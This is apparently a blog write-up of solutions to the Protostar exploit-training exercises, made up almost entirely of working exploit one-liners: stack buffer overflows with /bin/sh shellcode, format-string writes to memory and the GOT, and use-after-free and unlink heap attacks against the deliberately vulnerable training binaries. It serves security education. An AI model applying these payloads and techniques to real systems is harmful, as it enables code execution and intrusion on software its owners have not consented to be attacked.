专栏首页BinarySecExploit-Exercises Protostar writeup PART I

Exploit-Exercises Protostar writeup PART I

stack0

$ python -c "print 0x44*'a'" | ./stack0you have changed the 'modified' variable

stack1

$ python -c "print 0x40*'a'+'\x64\x63\x62\x61'" | xargs ./stack1you have correctly got the variable to the right value

stack2

import ospayload = 'a'*0x40 + '\x0a\x0d\x0a\x0d'os.putenv("GREENIE", payload)os.system("./stack2")

stack3

$ readelf -a stack3 | grep winThere are no unwind sections in this file. 56: 08048424 20 FUNC GLOBAL DEFAULT 14 win$ python -c "print 0x40*'a'+'\x24\x84\x04\x08'" | ./stack3calling function pointer, jumping to 0x08048424code flow successfully changed

stack 4

$ readelf -a stack4 | grep winThere are no unwind sections in this file. 56: 080483f4 20 FUNC GLOBAL DEFAULT 14 win$ python -c "print 76*'a'+'\xf4\x83\x04\x08'"|./stack4code flow successfully changed

stack5

gdb-peda$ checksecCANARY : disabledFORTIFY : disabledNX : disabledPIE : disabledRELRO : disabled

系统没开ASLR。让程序崩溃,调试core dump获得stack address。

python -c "print 0x4c*'a'+'\x10\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack5

stack6

return addr => addr(ret) => stack addr

# retn 0x08048508python -c "print 0x50*'a'+'\x08\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6

stack7

# retn 0x08048553python -c "print 0x50*'a'+'\x53\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6

format0

root@protostar:/opt/protostar/bin# python -c "print 0x40*'a'+'\xef\xbe\xad\xde'" | xargs ./format0you have hit the target correctly :)

format1

%128$n代表第128个参数,argv会放在栈上。

root@protostar:/opt/protostar/bin# python -c "print '\x38\x96\x04\x08\x08\x04aaa%128\$n'" | xargs ./format1 aaayou have modified the target :)

format2

[-------------------------------------code-------------------------------------] 0x8048477 <vuln+35>: call 0x804835c <fgets@plt> 0x804847c <vuln+40>: lea eax,[ebp-0x208] 0x8048482 <vuln+46>: mov DWORD PTR [esp],eax=> 0x8048485 <vuln+49>: call 0x804837c <printf@plt> 0x804848a <vuln+54>: mov eax,ds:0x80496e4 0x804848f <vuln+59>: cmp eax,0x40 0x8048492 <vuln+62>: jne 0x80484a2 <vuln+78> 0x8048494 <vuln+64>: mov DWORD PTR [esp],0x8048590Guessed arguments:arg[0]: 0xffffd450 ("aaaaaa\n")[------------------------------------stack-------------------------------------]0000| 0xffffd440 --> 0xffffd450 ("aaaaaa\n")0004| 0xffffd444 --> 0x2000008| 0xffffd448 --> 0xf7fc2c20 --> 0xfbad22880012| 0xffffd44c --> 0xf7fec308 (<_dl_check_map_versions+632>: mov edi,eax)0016| 0xffffd450 ("aaaaaa\n")

exploit:

root@protostar:/opt/protostar/bin# python -c "print '\xe4\x96\x04\x08%4\$060x%4\$n'" | ./format2.0000000000000000000000000000000000000000000000000000080496e4you have modified the target :)

format3

python -c "print '\xf4\x96\x04\x08%12\$016930112x%12\$n'" | ./format3

看了我的方法还是有点弱- -,基本就是一字节写比较好的方法

python -c 'print "\xf4\x96\x04\x08"+"\xf5\x96\x04\x08"+"\xf6\x96\x04\x08"+"\xf7\x96\x04\x08"+"%52x%12$n%13$n%14$n%15$n"' | ./format3target is 44444444 :(

format4

写exit的GOT表中的数据,GOT["exit"]=0x08049724,单字节写入。

python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08'+'%0164x%4\$n%0208x%5\$n%0128x%6\$n%260x%7\$n'" | ./format4

heap0

winner = 0x08048464

root@protostar:/opt/protostar/bin# python -c "print 72*'a'+'\x64\x84\x04\x08'" | xargs ./heap0data is at 0x804a008, fp is at 0x804a050level passed

heap1

GOT[“puts”] = 0x08049774 winner = 0x08048494 没啥说的,把第二个指针覆盖为puts的got地址,第二次strcpy把winner写入puts的got表中

root@protostar:/opt/protostar/bin# ./heap1 $(python -c "print 20 * 'a' + '\x74\x97\x04\x08'") $(python -c "print '\x94\x84\x04\x08'")and we have a winner @ 1491862467

heap2

很明显的UAF,struct auth = 36字节,先创建auth,再free再用strdup分配36字节大小的空间即可。

[ auth = (nil), service = (nil) ]auth aaaaa[ auth = 0x903d008, service = (nil) ]reset[ auth = 0x903d008, service = (nil) ]serviceaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[ auth = 0x903d008, service = 0x903d018 ]loginyou have logged in already![ auth = 0x903d008, service = 0x903d018 ]

heap3

unlink导致任意地址写

root@protostar:/opt/protostar/bin# ./heap3 $(python -c 'print "A" * 4 + "\x68\x64\x88\x04\x08\xc3"') $(python -c 'print "A" * 32 + "\xf8\xff\xff\xff" + "\xfc\xff\xff\xff" + "A" * 8 + "\x1c\xb1\x04\x08" + "\x0c\xc0\x04\x08"') CCCCthat wasn't too bad now, was it? @ 1491865342

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【XSS漏洞】通过XSS实现网页挂马

    前面也写了两期XSS相关的内容,今天就来点高大上的(并不是!),我们来通过XSS实现网页挂马~

    一名白帽的成长史
  • 早起—怎样开启高效的一天?

    原文作者:Gianni Cara  原文出处:www.quora.com/What-is-the-most-inspiring-way-to-start-the...

    Ewall
  • 22个黑客练习的2网站

    信息技术的需求量现在很高。随着世界继续将一切变成应用程序,甚至连最基本的设备都连接到互联网,需求只会增长,所以现在每个人都想学习黑客也就不足为奇了。 然而,几...

    网e渗透安全部
  • 星球优秀成员作品 | 『VulnHub系列』symfonos: 3-Walkthrough

    target设置为http://192.168.0.110/尝试了不同的字典,发现的结果只有index.html和/gate

    7089bAt@PowerLi
  • 初探Chrome沙箱逃逸

    众所周知沙箱是Chrome重要的安全机制,有沙箱就意味着v8、音视频解码等等渲染层的漏洞不能直接打到host上,所以我们想要pwn Chrome至少要两个漏洞,...

    Gamma实验室
  • Why JavaScript is Compulsory for Modern Web Development?

    Why JavaScript is essential for modern web development? JavaScript has had a maj...

    用户4822892
  • Golang modules and gitlab CI

    This is a quick writeup of how to set up a simple ci pipeline for a go project o...

    李海彬
  • Effective Testing with RSpec 3 (英文版)(序言)

    Early praise for Effective Testing with RSpec 3

    不知雨
  • CVE-2020-16875 Exchange 命令执行漏洞

    https://x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-...

    Khan安全团队
  • 2017 年关于 Python 案例的 Top45 文章

    本文为雷锋字幕组编译的年度盘点系列,原标题Python Top 45 Articles for the Past Year (v.2018),作者Mybrid...

    AI研习社
  • SAP UI5自学教程一:button.js的加载逻辑

    As a Fiori developer it is essential to not only learn how to use a given Fiori ...

    Jerry Wang
  • leetcode 10 Regular Expression Matching(简单正则表达式匹配)

    最近代码写的少了,而leetcode一直想做一个python,c/c++解题报告的专题,c/c++一直是我非常喜欢的,c语言编程练习的重要性体现在linux内核...

    流川疯
  • 「Rust语言」最全的Rust初学者的完全免费资源

    下面的图表来自评测游戏,显示了Rust与其他编程语言相比是多么的快。你可以在这里找到Go语言的对比。

    首席架构师智库
  • 15 Best Tools for Java Developers in 2020

    Software engineers have just begun making a decent procedure to their objectives...

    用户4822892
  • Windows提权WiKi

    HACK学习
  • How to Improve Your Programming Skills?

    How-to-Improve-your-Programming-skills.png

    用户4822892
  • [网络安全] 三十.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(3)

    Vulnhub是一个特别好的渗透测试实战靶场,提供了许多带有漏洞的渗透测试虚拟机下载。作者会深入分析20多个案例来熟悉各种Web渗透工具及方法,希望能帮助到您。

    Eastmount
  • Python机器学习的练习四:多元逻辑回归

    在本系列的第3部分中,我们实现了简单的和正则化的逻辑回归。但我们的解决方法有一个限制—它只适用于二进制分类。在本文中,我们将在之前的练习中扩展我们的解决方案,以...

    AiTechYun
  • 【论文推荐】最新七篇视觉问答(VQA)相关论文—差别注意力机制、视觉问题推理、视觉对话、数据可视化、记忆增强网络、显式推理

    WZEARW

扫码关注云+社区

领取腾讯云代金券